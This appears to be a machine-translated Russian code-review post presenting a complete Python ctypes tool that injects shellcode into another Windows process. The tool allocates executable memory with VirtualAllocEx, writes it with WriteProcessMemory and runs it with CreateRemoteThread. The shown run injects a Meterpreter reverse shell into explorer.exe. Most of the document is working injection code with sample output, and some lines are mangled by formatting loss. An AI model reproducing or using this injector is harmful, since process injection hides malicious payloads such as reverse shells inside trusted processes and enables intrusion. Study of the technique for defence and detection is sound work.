Чтобы попрактиковаться в Windows API и ctypes
, Я решил написать программу, способную внедрять и запускать шелл-код внутри другого указанного процесса.
Пример:
C:UsersAdminDesktop>python inject.py -n explorer.exe -s shellcode.txt
Remote memory address: 0x40a0000
Remote thread created. Thread ID: 7960
Closed Proc Handle
Это успешно запускает шеллкод, сохраненный в shellcode.txt
(обратная оболочка Meterpreter) внутри explorer.exe
в новой теме:
Он работает, открывая дескриптор целевого процесса, выделяя некоторую память, записывая шелл-код в эту память, а затем передавая этот адрес памяти в CreateRemoteThread
.
Я хотел бы получить совет в основном по двум вопросам:
Использование Windows API. Я впервые использовал API напрямую. Я хотел бы знать, делаю ли я что-нибудь не так, прежде чем случайно сделаю это привычкой.
Использование
ctypes
: Я редко используюctypes
, и это самый сложный случай, в котором я когда-либо его использовал.Я создаю много «типизированных псевдонимов» внешних вызовов с помощью помощника:
def typed_f(function_ptr, arg_types, return_type): function_ptr.argtypes = arg_types function_ptr.restype = return_type return function_ptr create_snapshot = typed_f(kernel32.CreateToolhelp32Snapshot, [cw.DWORD, cw.DWORD], cw.HANDLE)
Это типично? Есть ли лучший способ добиться того же?
Он состоит из двух частей: ctypes
оболочки, а затем код, который использует оболочки для внедрения процесса.
process_helpers.py
:
import ctypes as c
import ctypes.wintypes as cw
from typing import Optional, Iterator
TH32CS_SNAPPROCESS = 0x2 # Get snapshot of all processes
MAX_PATH_LENGTH = 255
INVALID_HANDLE_VALUE = -1
kernel32: c.WinDLL = c.windll.kernel32
class PROCESSENTRY32(c.Structure):
_fields_ = [("dwSize", cw.DWORD),
("cntUsage", cw.DWORD),
("th32ProcessID", cw.DWORD),
("th32DefaultHeapID", cw.PULONG),
("th32ModuleID", cw.DWORD),
("cntThreads", cw.DWORD),
("th32ParentProcessID", cw.DWORD),
("pcPriClassBase", cw.LONG),
("dwFlags", cw.DWORD),
("szExeFile", cw.CHAR * MAX_PATH_LENGTH)]
LPPROCESSENTRY32 = c.POINTER(PROCESSENTRY32)
def typed_f(function_ptr, arg_types, return_type):
function_ptr.argtypes = arg_types
function_ptr.restype = return_type
return function_ptr
create_snapshot = typed_f(kernel32.CreateToolhelp32Snapshot,
[cw.DWORD, cw.DWORD],
cw.HANDLE)
first_process = typed_f(kernel32.Process32First,
[cw.HANDLE, LPPROCESSENTRY32],
c.c_bool)
next_process = typed_f(kernel32.Process32Next,
[cw.HANDLE, LPPROCESSENTRY32],
c.c_bool)
close_handle = typed_f(kernel32.CloseHandle,
[cw.HANDLE],
c.c_bool)
open_process = typed_f(kernel32.OpenProcess,
[cw.DWORD, c.c_bool, cw.DWORD],
cw.HANDLE)
remote_virtual_alloc = typed_f(kernel32.VirtualAllocEx,
[cw.HANDLE, cw.LPVOID, c.c_size_t, cw.DWORD, cw.DWORD],
cw.LPVOID)
remote_virtual_free = typed_f(kernel32.VirtualFree,
[cw.HANDLE, cw.LPVOID, c.c_size_t, cw.DWORD],
c.c_bool)
# Needed when modifying executable memory.
flush_instruction_cache = typed_f(kernel32.FlushInstructionCache,
[cw.HANDLE, cw.LPCVOID, c.c_size_t],
c.c_bool)
remote_write_memory = typed_f(kernel32.WriteProcessMemory,
[cw.HANDLE, cw.LPVOID, cw.LPCVOID, c.c_size_t, c.POINTER(c.c_size_t)],
c.c_bool)
# FIXME: The second parameter isn't really a void pointer, it's a SECURITY_ATTRIBUTES pointer, but I don't think
# we need it, and we'd need to define a custom Structure to specify it.
# FIXME: The same goes for the fourth parameter. It's not actually a void pointer; it's a LPTHREAD_START_ROUTINE, which
# is a pointer to a function that takes a LPVOID (a pointer to a paramater struct), and returns a DWORD.
remote_thread_create = typed_f(kernel32.CreateRemoteThread,
[cw.HANDLE, cw.LPVOID, c.c_size_t, cw.LPVOID, cw.LPVOID, cw.DWORD, cw.LPDWORD],
cw.HANDLE)
def create_process_snapshot() -> cw.HANDLE:
return create_snapshot(TH32CS_SNAPPROCESS, -1)
def list_processes() -> Optional[list[PROCESSENTRY32]]:
"""Returns a list of information about all active processes at the time the call is made, or
None if a snapshot couldn't be taken."""
snapshot = create_process_snapshot()
if snapshot == INVALID_HANDLE_VALUE:
return None
try:
proc_entry = PROCESSENTRY32()
proc_entry.dwSize = c.sizeof(PROCESSENTRY32)
read_success = first_process(snapshot, c.byref(proc_entry))
entries = []
while True:
if read_success:
entry_copy = PROCESSENTRY32()
c.memmove(c.byref(entry_copy), c.byref(proc_entry), proc_entry.dwSize)
entries.append(entry_copy)
else:
break
read_success = next_process(snapshot, c.byref(proc_entry))
finally:
close_handle(snapshot)
return entries
def get_process_ids(process_name: bytes) -> Iterator[int]:
"""Returns all process IDs at the time of calling, or nothing if a list of processes couldn't be obtained."""
processes = list_processes()
if processes is None:
return
for proc in processes:
if proc.szExeFile == process_name:
yield proc.th32ProcessID
def formatted_last_error(task_message: str) -> str:
return f"Failed to {task_message}. Error: {kernel32.GetLastError()}"
inject.py
import ctypes as c
import ctypes.wintypes as cw
from argparse import ArgumentParser
from os import fsencode
import process_helpers as ph
# The permissions required to create a thread and write to the enclosing process' memory.
PROCESS_CREATE_THREAD = 0x2
PROCESS_VM_OPERATION = 0x8
PROCESS_VM_WRITE = 0x20
PROCESS_VM_READ = 0x10
PROCESS_QUERY_INFORMATION = 0x400
REQUIRED_RIGHTS_TO_INJECT = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION
| PROCESS_VM_WRITE | PROCESS_VM_READ
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
MEM_RELEASE = 0x8000
START_RUNNING = 0x0
def open_process_for_injection(pid: int) -> cw.HANDLE:
proc_handle = ph.open_process(REQUIRED_RIGHTS_TO_INJECT, False, pid)
if proc_handle is None:
raise RuntimeError(ph.formatted_last_error("open process"))
else:
return proc_handle
def write_shellcode_to_process(process_handle: cw.HANDLE, shellcode: bytes) -> cw.LPVOID:
shellcode_length = len(shellcode)
# Allocate memory to write the shellcode to.
remote_memory_addr = ph.remote_virtual_alloc(process_handle, None, shellcode_length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
if remote_memory_addr is None:
raise RuntimeError(ph.formatted_last_error("allocate memory"))
else:
print("Remote memory address:", hex(remote_memory_addr))
# TODO: Check for how much was written? Do we care?
write_result = ph.remote_write_memory(process_handle, remote_memory_addr, shellcode, shellcode_length, None)
if write_result:
ph.flush_instruction_cache(process_handle, remote_memory_addr, shellcode_length)
return remote_memory_addr
else:
raise RuntimeError(ph.formatted_last_error("write shellcode"))
def start_remote_thread(process_handle: cw.HANDLE, shellcode_address: cw.LPVOID) -> None:
thread_id = cw.DWORD()
thread_id_ptr = c.byref(thread_id)
thread_handle = ph.remote_thread_create(process_handle,
None, # Default security
0, # Default stack size
shellcode_address,
None, # No argument to pass
START_RUNNING,
thread_id_ptr)
if thread_handle is None:
raise RuntimeError(ph.formatted_last_error("start thread"))
else:
print("Remote thread created. Thread ID:", thread_id.value)
def inject_code(target_process_pid: int, shellcode: bytes) -> None:
# Get a handle to the process so we can create a remote thread and write to it.
proc_handle = open_process_for_injection(target_process_pid)
try:
shellcode_ptr = write_shellcode_to_process(proc_handle, shellcode)
start_remote_thread(proc_handle, shellcode_ptr)
# TODO: Currently leaking memory.
finally:
ph.close_handle(proc_handle)
print("Closed Proc Handle")
def main():
parser = ArgumentParser()
parser.add_argument("-n", "--name",
help="Name of the process to inject into.")
parser.add_argument("-s", "--shellcode",
help="The path to the shellcode to inject.")
args = parser.parse_args()
with open(args.shellcode, "rb") as f:
shellcode = f.read()
# A bit of an abuse of the function, but it reverses the decoding does to command-line arguments, since we need bytes.
proc_name = fsencode(args.name)
pids = ph.get_process_ids(proc_name)
first_pid = next(pids, None)
if first_pid is None:
raise ValueError(f"Process {args.name} not found!")
else:
inject_code(first_pid, shellcode)
if __name__ == "__main__":
main()